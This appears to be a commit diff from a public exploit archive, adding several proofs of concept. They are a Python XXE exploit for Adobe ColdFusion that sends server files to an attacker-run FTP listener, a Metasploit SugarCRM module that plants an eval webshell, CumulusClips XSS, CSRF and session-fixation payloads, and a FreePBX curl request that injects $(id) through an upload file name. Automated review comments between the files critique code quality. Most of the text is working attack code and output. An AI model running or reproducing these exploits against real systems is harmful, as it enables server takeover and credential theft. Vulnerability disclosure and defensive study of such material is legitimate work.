DB: 2016-09-08

6 new exploits

Too many to list!
Offensive Security 2016-09-08 05:08:29 +00:00
parent d36011b4f9
commit 2aa9d941de
8 changed files with 3077 additions and 1814 deletions

files.csv



@ -1,6 +1,8 @@
# Exploit Title: ProFTPD IAC Remote Root Exploit
# Date: 7 November 2010
# Author: Kingcope
#
# E-DB Note: If you have issues with this exploit, alter lines 549, 555 and 563.
use IO::Socket;
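Review bot: the E-DB note added in this hunk tells the reader to "alter lines 549, 555 and 563" without saying what those lines hold or how they should be changed, and bare line numbers go stale as soon as the file is touched; this very header change (-1,6 +1,8) already shifts every later line by two, so the numbers need to be verified against the new numbering. Suggest naming the variables or values on those lines in the note instead, so the guidance survives future edits.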


@ -0,0 +1,572 @@
'''
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com
- CVE-2016-4264
- APSB16-30
- Release date: 31.08.2016
- Severity: Critical
=============================================
I. VULNERABILITY
-------------------------
Adobe ColdFusion <= 11 XML External Entity (XXE) Injection
II. BACKGROUND
-------------------------
"Adobe ColdFusion 11 Enterprise Edition offers a single platform to
rapidly build and deploy scalable, high-performing web and mobile
applications. Leverage unique capabilities to develop, test, and debug
mobile applications end to end. Generate high-quality PDF files and
manipulate them easily."
http://www.adobe.com/products/coldfusion-family.html
ColdFusion is widely deployed. A google search for a ColdFusion index file
(index.cfm) exposes over 30 million websites of various sectors that make use
of ColdFusion platform in a visible way:
https://www.google.com/?q=inurl:%2Findex.cfm
including various government websites:
https://www.google.com/search?q=inurl:index.cfm+site:gov
III. INTRODUCTION
-------------------------
An independent research revealed that Adobe ColdFusion in versions 11 and below
is vulnerable to XXE Injection when processing untrusted office documents.
Depending on web application's functionality and the attacker's ability to
supply a malicious document to be processed by a vulnerable ColdFusion
application, this vulnerability may potentially be exploited by both
low-privileged and unauthenticated remote attackers.
This vulnerability can allow various attacks including:
- reading arbitrary files (stored on the server and within the network shares)
- listing web/system directories
- SSRF attacks / unauthorized access to restricted services running on the localhost
as well as within the victim's server network
- SMB relay attacks
- temporary file uploads which may be used by attackers in combination with LFI
vulnerabilities to supply malicious code
This advisory provides a PoC exploit that demonstrates how a remote attacker
could read arbitrary files from the target server, as well as list directories.
Ability to read arbitrary files could for example let attackers extract sensitive
information such as ColdFusion password hashes of the management console or stored
database credentials.
This could allow unauthorized access to weakly protected ColdFusion management
interfaces and let attackers upload malicious code which could be used to fully
compromise the server.
IV. DESCRIPTION
-------------------------
The XXE vulnerability was found in the Office Open XML (OOXML) processing
functions which are utilised when opening documents that use XML structure.
Documents that are commonly stored in this format include:
- DOCX (Word documents)
- XLSX (Excel spreadsheets)
- PPTX (PowerPoint presentations)
More information about the format can be found in:
https://en.wikipedia.org/wiki/Office_Open_XML
The vulnerability is caused by an unrestricted XML parser which allows
for external XML entities processing when parsing such document.
Many web applications often accept OOXML documents from their users to process
documents of various purposes, for example:
- invoices
- bank statements
- bills
- tax forms
- inventory
- CVs / cover letters
- application forms
etc.
Such upload functionality is often exposed to low-privileged or even
unauthenticated remote users.
If an attacker is able to upload a specially crafted OOXML document
which is later processed by an application written in Adobe ColdFusion,
they may be able to perform various malicious actions including
arbitrary file reading and directory listing as mentioned in the
introduction.
This could for example be used by malicious users to read sensitive
ColdFusion config files such as:
- neo-security.xml , which stores ColdFusion admin's password hash salt
- password.properties , which stores admin's password hash
- neo-datasource.xml , which stores database credentials
that are stored in c:\ColdFusion11\cfusion\lib\ directory by default on Windows
installations.
Attackers might also access the application sourcecodes within the documentroot:
c:\ColdFusion11\cfusion\wwwroot
or access other sensitive system files available within the system.
As the vulnerability also allows browsing the filesystem and its directories,
attackers may easily find interesting files and ColdFusion config/webroot
directories even if the paths differ from the default ones.
Attackers who have gained access to password hashes could then proceed
to cracking them in order to gain unauthorised access to the databases and
ColdFusion administrator panels to fully compromise the target.
More information on hashes used by ColdFusion 11 can be found in the references
below.
The next section presents a PoC exploit that can be used for file/directory
retrieval.
The exploit will work even if the target ColdFusion application does not return
any data back to the attacker upon processing a malicious document file.
The extracted data will be sent over the network back to the attacker as soon
as the document file is processed.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
An example vulnerable ColdFusion application written in CFML language
which loads a spreadsheet document could look as follows:
---[ vulnerable.cfm ]---
<cfspreadsheet format="csv" action="read" src="#expandPath( 'cf_poc_exploit.xlsx' )#" name="xlsdoc" rows="1-4" />
<cfoutput>#xlsdoc#</cfoutput>
------------------------
For simplicity, this ColdFusion application will load cf_poc_exploit.xlsx
document from the current directory.
In a real-world situation the application would allow a user to upload a
document from their disk or alternatively fetch it from a URL.
Attacker could use the exploit below to prepare a malicious document and
supply it to a vulnerable ColdFusion application.
---[ ./cf_xxe_exploit.py ]---
'''
#!/usr/bin/python
intro = """
(CVE-2016-4264) ColdFusion <= 11 XXE / Arbitrary File Read PoC exploit
This exploit produces a PoC OOXML spreadsheet document with XXE payload that can be
uploaded to a vulnerable ColdFusion application.
It starts up an ftp/data receiver (port 9090) as well as a web server (port 8080)
in order to retrieve an arbitrary file from the victim (upon processing the PoC spreadsheet).
Discovered/Coded by:
Dawid Golunski
http://legalhackers.com
"""
usage = """
Usage:
The exploit requires that you have an external IP and can start web/http listeners on ports
8080/9090 on the attacking machine.
./cf_xxe_exploit.py external_IP 'path_to_fetch'
The example below starts an ftp listener on 192.168.1.40 (port 9090) and web server on 8080
and fetches c:\windows\win.ini file from the target.
./cf_xxe_exploit.py 192.168.1.40 c:/windows/win.ini
The path can also be a directory to retrieve a directory listing e.g:
./cf_xxe_exploit.py 192.168.1.40 c:/
will list the contents of drive C: on Windows
Disclaimer:
For testing purposes only. Do no harm.
Full advisory URL:
http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt
"""
import socket
import subprocess
import sys
import web # http://webpy.org/installation
import threading
import time
# What file to retrieve from the victim server
target_file = "c:/ColdFusion11/cfusion/lib/pass"
# Web server (to serve XML)
external_ip = '192.168.57.10'
web_port = 8080
# File receiver
ftp_port = 9090
timeout=5
# HTTP listener that will return intermediate XML (passdata.xml) in order to establish an ftp connection
class webserver(threading.Thread):
def run (self):
urls = ('/passdata.xml', 'pass_xml')
app = web.application(urls, globals())
#app.run()
return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', web_port))
# Pass data to ftp server using passdata.xml
class pass_xml:
def GET(self):
print xxe_send_payload
# HTTP listener that will return intermediate XML (passdata.xml) in order to establish an ftp connection
class webserver(threading.Thread):
def run (self):
urls = ('/passdata.xml', 'pass_xml')
app = web.application(urls, globals())
#app.run()
return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', web_port))
# Return helper xml/xxe payload to forward data
class pass_xml:
def GET(self):
print "[+] Received GET /passdata.xml web request from the victim (%s) ! TARGET VULNERABLE to XXE !\n" % (web.ctx['ip'])
return xxe_send_payload
def shutdown(code):
print "[+] That's it folks :) Shutting down \n"
web.httpserver.server.interrupt = KeyboardInterrupt()
exit(code)
# [ Main Meat ]
print intro
redirector_started = 0
if len(sys.argv) < 3 :
print usage
sys.exit(2)
# Overwrite settings with parameters from argv[]
external_ip = sys.argv[1]
target_file = sys.argv[2]
print "[+] Setting external IP to '%s' and target path to '%s'\n" % (external_ip, target_file)
# Prepare XXE payloads
#OOXML XXE stub
ooxml_xxe_payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Types [
<!ENTITY % remote SYSTEM "http://_attackerhost_:_webport_/passdata.xml">
%remote;
]>
"""
ooxml_xxe_payload = ooxml_xxe_payload.replace("_attackerhost_", external_ip)
ooxml_xxe_payload = ooxml_xxe_payload.replace("_webport_", str(web_port))
# passdata.xml
xxe_send_payload = """<!ENTITY % file1 SYSTEM "file:///_filepath_">
<!ENTITY % param1 '<!ENTITY &#37; retrfile1 SYSTEM "ftp://cfhack:PoCexploit@_attackerhost_:_ftpport_/%file1;" >' >
%param1;
%retrfile1; """
xxe_send_payload = xxe_send_payload.replace("_filepath_", target_file)
xxe_send_payload = xxe_send_payload.replace("_attackerhost_", external_ip)
xxe_send_payload = xxe_send_payload.replace("_ftpport_", str(ftp_port))
# Create OXML spreadsheet file cf_poc_spreadsheet.xlsx with XXE payload
f = open("[Content_Types].xml", "w")
f.write(ooxml_xxe_payload )
f.close()
cmd = "zip -r cf_poc_spreadsheet.xlsx '[Content_Types].xml' && rm -f '[Content_Types].xml'"
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(result, error) = process.communicate()
rc = process.wait()
if rc != 0:
print "Error: failed to execute command:", cmd
print error
shutdown(3)
print "[+] Successfully created PoC spreadsheet with XXE payload in 'cf_poc_spreadsheet.xlsx' file\n"
print "[+] Starting our web server to serve XML on %s:%s \n" % (external_ip, web_port)
webserver().start()
time.sleep(1)
print '\n[+] Starting FTP/data listener and waiting for connection on %s:%d\n' % (external_ip, ftp_port)
s = socket.socket() # Create/bind socket
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((external_ip, ftp_port))
print "[*] Upload the 'cf_poc_spreadsheet.xlsx' spreadsheet document to the target ColdFusion app now...\n"
s.listen(5) # Wait for the victim to connect
c, addr = s.accept() # Establish connection with the victim
print '\n[+] Got a connection from ', addr, " to our FTP/data server. Meaning juicy data is on the way! :)\n"
c.send("220 Welcome to ColdFusion XXE PoC exploit server\n")
print '[+] Receiving data from the victim...\n'
downloaded = ""
while True:
data = ""
c.settimeout(timeout)
try:
data = c.recv(1024)
except socket.timeout:
print "Timeout ! No more data\n"
break
# extract data
if data.startswith("CWD "):
downloaded = downloaded + data[4:]
if data.startswith("RETR "):
downloaded = downloaded + data[5:]
print "Received packet: " + data
#sys.stdout.write('.')
#sys.stdout.flush()
if "USER" in data:
c.send("331 password needed\n")
elif "RETR" in data:
c.send("550 No such file or directory.\n")
break
else:
c.send('230 continue\n')
# Results
print "\n\n[+] Here's the retrieved contents of the target file/directory (%s) : \n\n%s\n" % (target_file, downloaded)
# shutdown
c.close() # Close the connection
s.shutdown(0)
s.close()
shutdown(0)
'''
-------------[eof]-----------
You can see the exploit in action in a PoC video at:
http://legalhackers.com/videos/ColdFusion-XXE-PoC-Exploit
There are also two examples below:
A) Reading c:/ColdFusion11/cfusion/lib/neo-security.xml file which contains admin hash salt:
root@trusty:~/exploit# ./cf_xxe_exploit.py 192.168.57.10 c:/ColdFusion11/cfusion/lib/neo-security.xml
(CVE-2016-4264) ColdFusion <= 11 XXE / Arbitrary File Read PoC exploit
This exploit produces a PoC OOXML spreadsheet document with XXE payload that can be
uploaded to a vulnerable ColdFusion application.
It starts up an ftp/data receiver (port 9090) as well as a web server (port 8080)
in order to retrieve an arbitrary file from the victim (upon processing the PoC spreadsheet).
Discovered/Coded by:
Dawid Golunski
http://legalhackers.com
[+] Setting external IP to '192.168.57.10' and target path to 'c:/ColdFusion11/cfusion/lib/neo-security.xml'
[+] Successfully created PoC spreadsheet with XXE payload in 'cf_poc_spreadsheet.xlsx' file
[+] Starting our web server to serve XML on 192.168.57.10:8080
http://0.0.0.0:8080/
[+] Starting FTP/data listener and waiting for connection on 192.168.57.10:9090
[*] Upload the 'cf_poc_spreadsheet.xlsx' spreadsheet document to the target ColdFusion app now...
[+] Received GET /passdata.xml web request from the victim (192.168.57.21) ! TARGET VULNERABLE to XXE !
192.168.57.21:57219 - - [31/Aug/2016 20:12:06] "HTTP/1.1 GET /passdata.xml" - 200 OK
[+] Got a connection from ('192.168.57.21', 57220) to our FTP/data server. Meaning juicy data is on the way! :)
[+] Receiving data from the victim...
Received packet: USER cfhack
Received packet: PASS PoCexploit
Received packet: TYPE I
Received packet: CWD <wddxPacket version='1.0'><header
[cut]
[+] Here's the retrieved contents of the target file/directory (c:/ColdFusion11/cfusion/lib/neo-security.xml) :
<wddxPacket version='1.0'><header
[cut]
struct><
var><var name='admin.userid.root.salt'><string>A54B28011C6AC37F4D65B7D608D40722DAD6CDF25A943C809492637D2CC6265F<
string><
var><var name='rds.enabled'><string>false<
[cut]
[+] That's it folks :) Shutting down
~~~~~~~~~~~~
B) Listing the contents of the c:/ColdFusion11/ directory:
root@trusty:~/exploit# ./cf_xxe_exploit.py 192.168.57.10 c:/ColdFusion11/
[cut]
[+] Setting external IP to '192.168.57.10' and target path to 'c:/ColdFusion11/'
[+] Successfully created PoC spreadsheet with XXE payload in 'cf_poc_spreadsheet.xlsx' file
[+] Starting our web server to serve XML on 192.168.57.10:8080
http://0.0.0.0:8080/
[+] Starting FTP/data listener and waiting for connection on 192.168.57.10:9090
[*] Upload the 'cf_poc_spreadsheet.xlsx' spreadsheet document to the target ColdFusion app now...
[+] Received GET /passdata.xml web request from the victim (192.168.57.21) ! TARGET VULNERABLE to XXE !
192.168.57.21:57245 - - [31/Aug/2016 20:14:06] "HTTP/1.1 GET /passdata.xml" - 200 OK
[+] Got a connection from ('192.168.57.21', 57246) to our FTP/data server. Meaning juicy data is on the way! :)
[+] Receiving data from the victim...
Received packet: USER cfhack
Received packet: RETR Adobe_ColdFusion_11_Install_08_30_2016_19_59_04.log
cf_app.ico
[cut]
[+] Here's the retrieved contents of the target file/directory (c:/ColdFusion11/) :
Adobe_ColdFusion_11_Install_08_30_2016_19_59_04.log
cf_app.ico
cfusion
config
jre
license.html
Readme.htm
uninstall
[+] That's it folks :) Shutting down
VI. BUSINESS IMPACT
-------------------------
The vulnerability can be abused by low-privileged or unauthenticated remote
attackers depending on application's functionality and lead to sensitive
information disclosure. It can allow attackers to read arbitrary files or
expose internal services running on the server and within the local network.
Attackers could for example read stored password hashes or database credentials
which may aid attackers with gaining access to ColdFusion admin interface.
Extracting application sourcecodes could also be of use to attackers and help
them to find other vulnerabilities to fully compromise an affected target.
VII. SYSTEMS AFFECTED
-------------------------
ColdFusion installations before:
- ColdFusion 11 Update 10
- ColdFusion 10 Update 21
are affected by this vulnerability.
VIII. SOLUTION
-------------------------
Update to ColdFusion 11 Update 10 which include critical hotfixes released by
the vendor upon initial private disclosure to Adobe. Alternatively users can
upgrade their installation to ColdFusion 2016 which is not affected.
The vulnerability fix/advisory has been assigned APSB16-30 id by Adobe.
Links to the critical Adobe hotfix patches can be found in the references below.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt
http://legalhackers.com/exploits/cf_xxe_exploit_CVE-2016-4264.py
PoC exploit video:
http://legalhackers.com/videos/ColdFusion-XXE-PoC-Exploit
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4264
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4264
Adobe ColdFusion critical hotfix/vuln announcement:
https://helpx.adobe.com/security/products/coldfusion/apsb16-30.html
Info on ColdFusion configs and used hashes:
http://www.openwall.com/lists/john-users/2015/06/07/1
https://helpx.adobe.com/coldfusion/kb/purpose-location-xml-configuration-files.html
https://blogs.adobe.com/psirt/?p=1395
http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers
Lockdown guides:
http://www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/cf11/cf11-lockdown-guide.pdf
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
31.08.2016 - advisory released
01.09.2016 - corrections applied
07.09.2016 - added PoC video
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''
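Review bot: `webserver` and `pass_xml` are each defined twice in the script, and the first `pass_xml.GET` prints `xxe_send_payload` instead of returning it; Python keeps the later definition, so the script runs, but the first pair is dead code that will mislead anyone editing the file and should be dropped. The sample `vulnerable.cfm` in the advisory reads `cf_poc_exploit.xlsx` while the script writes `cf_poc_spreadsheet.xlsx`; one of the two names should be corrected so the PoC can be run as documented. Minor: the FTP receiver binds to `external_ip` while the web server binds `0.0.0.0`; binding both the same way would make the "requires an external IP" usage note accurate for both listeners.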

platforms/php/remote/40344.rb Executable file

@ -0,0 +1,89 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'SugarCRM REST Unserialize PHP Code Execution',
'Description' => %q{
This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23
which could be abused to allow unauthenticated users to execute arbitrary PHP code with
the permissions of the webserver. The dangerous unserialize() call exists in the
'/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()
method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.
},
'Author' => 'EgiX',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://karmainsecurity.com/KIS-2016-07'],
['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-001'],
['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-008'],
['URL', 'https://bugs.php.net/bug.php?id=72663']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['SugarCRM CE <= 6.5.23', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 23 2016'
))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"])
], self.class)
end
def exploit
upload_php = '/custom/' + rand_text_alpha(rand(4)+8) + '.php'
payload_serialized = "O:+14:\"SugarCacheFile\":23:{S:17:\"\\00*\\00_cacheFileName\";"
payload_serialized << "s:#{upload_php.length+2}:\"..#{upload_php}\";S:16:\"\\00*\\00"
payload_serialized << "_cacheChanged\";b:1;S:14:\"\\00*\\00_localStore\";a:1:{i:0;s:55"
payload_serialized << ":\"<?php eval(base64_decode($_SERVER['HTTP_PAYLOAD'])); ?>\";}}"
print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'service/v4/rest.php'),
'method' => 'POST',
'vars_post' => {
'method' => 'login',
'input_type' => 'Serialize',
'rest_data' => payload_serialized
}
})
if not res or res.code != 200
print_error("#{peer} - Exploit failed: #{res.code}")
return
end
register_files_for_cleanup(File.basename(upload_php))
print_status("#{peer} - Executing the payload #{upload_php}")
res = send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, upload_php),
'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) }
})
if res and res.code != 200
print_error("#{peer} - Payload execution failed: #{res.code}")
return
end
end
end
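Review bot: in `exploit`, the first failure branch `if not res or res.code != 200` goes on to evaluate `res.code` inside `print_error`, so a nil response (connection failure) raises `NoMethodError` instead of printing the error; use `res.nil? ? 'no response' : res.code`, and prefer `unless res && res.code == 200` over `if not` to match framework style. The second request has the opposite gap: `if res and res.code != 200` lets a nil `res` pass silently, so the module reports success when nothing was received. Also check `register_files_for_cleanup(File.basename(upload_php))`: the file is written to `/custom/<name>.php` under the web root, but only the basename is registered, so cleanup will find it only if the payload's working directory happens to be that directory.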

platforms/php/webapps/40343.txt Executable file

@ -0,0 +1,156 @@
# Exploit Title: CumulusClips Session fixation
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
Description:
CumulusClips is a video sharing script that allows you to start your own
video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS &
Android mobile devices, as well as all the major browsers.
PoC:
POST /cumulusclips/account/videos/edit/1362/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1362/
Cookie: PHPSESSID=bqaok1gfcs0s7hqfc40g2bsbr1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 211
title=evilcartoon%3Cscript%3Edocument.cookie%3D%27PHPSESSID%
3Dxxxxxxxxxxxxxxxxxxxxxxxxxx%3Bpath%3D%2F%3B%27%3C%
2Fscript%3E&tags=aaa&cat_id=1&description=aaa&private_url=
BOZtzZX&submitted=TRUE&button=Update+Video
Remediation:
Change session id after sucessful login
Post exploitation:
Since it is posible to impersonate admin there is possibility for a code
execution and unrestricted file upload in admin panel.
#######################################################
# Exploit Title: CumulusClips XSRF and code execution
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
# CVE : [if applicable]
Description:
CumulusClips is a video sharing script that allows you to start your own video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers.
PoC:
<html>
<body>
<form action="http://192.168.122.203/cumulusclips/cc-admin/members_add.php" method="POST">
<input type="hidden" name="role" value="admin" />
<input type="hidden" name="email" value="admin&#64;mailinator&#46;com" />
<input type="hidden" name="username" value="newadmin" />
<input type="hidden" name="password" value="newadminpass" />
<input type="hidden" name="password&#45;show" value="" />
<input type="hidden" name="first&#95;name" value="" />
<input type="hidden" name="last&#95;name" value="" />
<input type="hidden" name="website" value="" />
<input type="hidden" name="about&#95;me" value="" />
<input type="hidden" name="submitted" value="TRUE" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Remediation:
Use anti-csrf token, fix all XSS'es
#######################################################
# Exploit Title: CumulusClips Persistent XSS
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
# CVE : [if applicable]
Description:
CumulusClips is a video sharing script that allows you to start your own video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers.
Any registered user may inject a code to main site. There is no HTTPonly flag on cookies so it is possible to steal session information.
PoC:
locations:
/cumulusclips/account/videos/edit/
/cumulusclips/account/upload/video/
POST /cumulusclips/account/videos/edit/1358/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1358/
Cookie: PHPSESSID=etia0ncfb00m0ma1834cf1dds5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
title=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat_id=1&description=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&private_url=DyZbn8m&submitted=TRUE&button=Update+Video
reflected on main site:
GET /cumulusclips/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/
Connection: close
RESPONSE:
...
div class="video">
<div class="thumbnail">
<a href="http://192.168.122.203/cumulusclips/videos/1358/www-script-alert-1-script/" title="www<script>alert(1)</script>">
<img width="165" height="92" src="http://192.168.122.203/cumulusclips/cc-content/uploads/thumbs/Ufi5q2RKsQtXwludfZnR.jpg" />
...
Post exploitation:
Since it is posible to steal the cookie and impersonate admin there is possibility for a code execution and unrestricted file upload in admin panel.
Remediation:
Validate user input for special characters (preferable white list), use HTTPonly header
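Review bot: the header placeholder `# CVE : [if applicable]` is left unfilled in the second and third entries; it should carry an identifier or be removed. The first entry is titled "Session fixation", but its PoC sets `PHPSESSID` by injecting a `<script>` into the video title, i.e. it is delivered through the persistent XSS documented in the third entry, so its remediation should list both output encoding of the title field and session-id regeneration at login rather than regeneration alone. Spelling in the text: "sucessful", "posible" (twice); the cookie flag is conventionally written HttpOnly.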

platforms/php/webapps/40345.txt Executable file

@ -0,0 +1,122 @@
Vulnerable software : Freepbx
Tested versions : 13.0.x < 13.0.154
vendor : freepbx.org
Author : i-Hmx
Email : n0p1337@gmail.com
Home : sec4ever.com
Knock knock people , Eg-R1z on the mic again . .
Freepbx is vulnerable to unauthenticated remote command execution due to multiple weak inputs validation as well as partial authenticaion bypass
Need more technical shit?!
Here u go
File : /var/www/html/admin/libraries/Composer/vendor/symfony/process/Symfony/Component/Process/Process.php
class Process
{
const ERR = 'err';
const OUT = 'out';
const STATUS_READY = 'ready';
const STATUS_STARTED = 'started';
const STATUS_TERMINATED = 'terminated';
Line 145:
public function __construct($commandline, $cwd = null, array $env = null, $input = null, $timeout = 60, array $options = array())
{
if (!function_exists('proc_open')) {
throw new RuntimeException('The Process class relies on proc_open, which is not available on your PHP installation.');
}
--===>>> $this->commandline = $commandline;
$this->cwd = $cwd;
Line 275
$commandline = $this->commandline;
if ('\\' === DIRECTORY_SEPARATOR && $this->enhanceWindowsCompatibility) {
$commandline = 'cmd /V:ON /E:ON /C "('.$commandline.')';
foreach ($this->processPipes->getFiles() as $offset => $filename) {
$commandline .= ' '.$offset.'>'.ProcessUtils::escapeArgument($filename);
}
$commandline .= '"';
if (!isset($this->options['bypass_shell'])) {
$this->options['bypass_shell'] = true;
}
}
--===>>> $this->process = proc_open($commandline, $descriptors, $this->processPipes->pipes, $this->cwd, $this->env, $this->options);
Class is being called at
File : /var/www/html/admin/libraries/media/Media/Driver/Drivers/SoxShell.php
Line 118
public function convert($newFilename,$extension,$mime) {
switch($extension) {
case "wav":
switch($this->extension) {
case "sln":
$process = new Process($this->binary.' -t raw -s -b 16 -r 8000 '.$this->track.' -r '.$this->options['samplerate'].' -b '.$this->options['bitdepth'].' -c 1 '.$newFilename);
break;
case "sln12":
$process = new Proces.................
case "wav16":
---===>> $process = new Process($this->binary.' '.$this->track.' -t wav -b 16 -r 16000 -c 1 '.$newFilename);
break;
default:
$process = new Process($this->binary.' '.$this->track.' -c 1 '.$newFilename);
break;
}
if(!$this->background) {
---===>> $process->run();
if (!$process->isSuccessful()) {
throw new \RuntimeException($process->getErrorOutput());
}
} else {
$process->start();
if (!$process->isRunning()) {
throw new \RuntimeException($process->getErrorOutput());
}
}
}
Sox shell can be called via multiple parts of the fpbx including the music module
File : admin/modules/music/Music.class.php
Line : 407
$name = $dname . '.' . $extension;
move_uploaded_file($tmp_name, $this->tmp."/".$name);
$media->load($this->tmp."/".$name);
foreach($_POST['codec'] as $c) {
--==>> $media->convert($path."/".$dname.".".$c);
}
unlink($this->tmp."/".$name);
this part can be accessed by unauthenticated user and so it's obvious command execution vulnerable :/
POC :
[root:/lab/fpbx]# curl -i -s -k -X 'POST' \
-H 'User-Agent: sec4ever 1337s' -H 'Referer: http://x.x.x.x/admin/ajax.php' -H 'Content-Type: multipart/form-data; boundary=---------------------------317092200613369' \
--data-binary $'-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"extension\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"language\"\x0d\x0a\x0d\x0aen\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"filename\"\x0d\x0a\x0d\x0afa.wav\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"codec[1]\"\x0d\x0a\x0d\x0agsm\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"id\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"files[1]\"; filename=\"$(id).wav\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0aEg-R1z ruling you ;)\x0d\x0a-----------------------------317092200613369\x0d\x0a\x0d\x0a' \
'http://x.x.x.x/admin/ajax.php?module=music&command=upload'
HTTP/1.1 500 Internal Server Error
Date: Wed, 07 Sep 2016 17:33:02 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.28
Set-Cookie: lang=en_US
Set-Cookie: PHPSESSID=6j9ei3pn1btu2o6jc1j6mngmp4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Ignore-This: 1
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json
{"error":{"type":"RuntimeException","message":"\/usr\/bin\/sox formats: can't open input file `groups=498(asterisk).wav': No such file or directory\n","file":"\/var\/www\/html\/admin\/libraries\/media\/Media\/Driver\/Drivers\/SoxShell.php","line":194}}#
Patching : can be done via adding escapeshellarg to soxshell inputs
Almost fixed in fpbx later versions
# in this version spaces,',`,/,\,<,>,?,&,| are filtered , which can be super easily bypassed
# make a priv8 , burn another ;)
# From Eg-R1z with Love xD
